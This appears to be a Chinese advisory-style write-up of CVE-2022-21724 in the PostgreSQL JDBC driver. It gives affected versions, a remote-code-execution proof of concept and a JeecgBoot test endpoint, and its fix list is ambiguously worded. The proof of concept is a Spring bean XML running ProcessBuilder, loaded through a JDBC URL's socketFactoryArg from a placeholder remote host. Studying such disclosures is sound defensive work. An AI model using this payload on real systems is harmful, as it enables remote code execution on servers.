PostgresQL JDBC Drive 任意代码执行漏洞(CVE-2022-21724)
JDBC Java 数据库连接,(Java Database Connectivity)是 Java 语言中用来规范客户端如何访问数据库的应用程序接口,具体讲就是通过 Java 连接广泛数据库,并对表中数据执行增、删、改、查等操作的技术。
当程序中 JDBC 连接 URL 可控时,可能会造成安全问题。比较具有代表性的就是 JDBC 反序列化漏洞,是在于 mysql 数据库连接时产生的。
漏洞简介
在 PostgreSQL 数据库的 jdbc 驱动程序中发现一个安全漏洞。当攻击者控制 jdbc url 或者属性时,使用 PostgreSQL 数据库的系统将受到攻击。 pgjdbc 根据通过 authenticationPluginClassName、sslhostnameverifier、socketFactory 、sslfactory、sslpasswordcallback 连接属性提供类名实例化插件实例。但是,驱动程序在实例化类之前没有验证类是否实现了预期的接口。这可能导致通过任意类加载远程代码执行。
影响范围:
9.4.1208 <=PgJDBC <42.2.25
42.3.0 <=PgJDBC < 42.3.2
漏洞重现
xml文件
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder">
<constructor-arg value="calc" />
<property name="whatever" value="#{ pb.start() }"/>
</bean>
</beans>
参数
{"dbDriver":"org.postgresql.Driver",
"dbUrl":"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=https://yourIp:3000/bean.xml",
"dbName": "mysql",
"dbUsername":"1",
"dbPassword":"1"}
请求路径
192.168.88.2:9999/jeecg-boot/jmreport/testConnection
解决方案
1.升级 postgresql
<postgresql.version>42.3.2</postgresql.version>
2.ShiroConfig 权限控制 关闭
filterChainDefinitionMap.put(“/jmreport/**”, “anon”)